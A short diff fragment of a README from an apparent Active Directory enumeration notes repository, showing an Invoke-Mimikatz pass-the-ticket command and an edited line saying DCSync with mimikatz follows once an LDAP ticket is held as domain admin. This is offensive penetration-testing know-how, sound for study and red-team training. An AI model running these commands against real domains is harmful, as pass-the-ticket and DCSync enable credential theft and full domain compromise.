amTeaq/Enum-AD/README.md

 ```
 Invoke-Mimikatz -Command '"kerberos::ptt <Ticket.kirbi>"'
 ```
--> then we can dcsync with mimikatz
+-> then we can dcsync with mimikatz because we got ldap tgs as domain admin

 --------------------------------------------------------------